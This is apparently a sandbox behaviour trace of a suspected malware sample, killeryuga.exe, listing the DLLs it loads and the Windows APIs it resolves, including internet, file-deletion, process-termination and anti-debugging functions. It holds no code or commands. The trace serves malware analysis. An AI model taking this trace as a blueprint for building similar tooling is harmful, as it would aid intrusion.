Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76c31400 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76c317ec True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76c34a2d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x76c335b7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74d4cc89 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Module Load module_name = GDI32.dll, base_address = 0x75ad0000 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x75af1ace True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x75b14124 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x75b1232e True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x75b1555d True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x75af138a True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x75ae7590 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x75b1439f True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x7560503c True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x755feba1 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x755e6143 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x74f58bff True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x74f56c3c True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x74f6011a True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x74f7ed56 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77194100 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x74f63e75 True 1
System Get Time type = System Time, time = 2019-03-24 16:36:30 (UTC) True 1
System Get Time type = Ticks, time = 112882 True 1
System Get Time type = Performance Ctr, time = 17412281778 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
Environment Get Environment String - True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
System Get Info type = Hardware Information True 249
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
System Get Info type = Operating System True 1
Module Load module_name = RPCRT4.dll, base_address = 0x75ee0000 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeA, address_out = 0x75f23fc5 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringA, address_out = 0x75f5d918 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringW, address_out = 0x75f21ee5 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeW, address_out = 0x75f01635 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreate, address_out = 0x75eff48b True 1
Module Load module_name = MPR.dll, base_address = 0x74b30000 True 1
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetEnumResourceW, address_out = 0x74b33058 True 1
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetOpenEnumW, address_out = 0x74b32f06 True 1
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetCloseEnum, address_out = 0x74b32dd6 True 1
Module Load module_name = WININET.dll, base_address = 0x753d0000 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x753eab49 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x753f9197 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x753eb406 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x753ff18e True 1
Module Load module_name = WINMM.dll, base_address = 0x74af0000 True 1
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x74af26e0 True 1
Module Load module_name = SHLWAPI.dll, base_address = 0x75340000 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x753545bf True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7537ad1a True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendA, address_out = 0x7534d65e True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x753581ef True 1
Module Load module_name = KERNEL32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x76c4ce46 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x76c34435 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x76c35a4b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76c3103d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x76c34259 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76c31136 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x76c35371 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76c31986 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x76c3492b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x76c5830d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x76c34620 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x76c5d556 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x76c31072 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76c33ed3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76c52b7a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x76c35929 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x76c5594d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x76c49af0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x76c58baf True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76c3168c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x76c3183e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x76c5896c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x76c5828e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x76c34c6b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x76c389b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76c32d3c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76c53102 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x76c35444 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76c52a9d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x76c35558 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x76c34467 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76c334d5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x76c534d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76c33bca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x76cb4691 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76c317ec True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
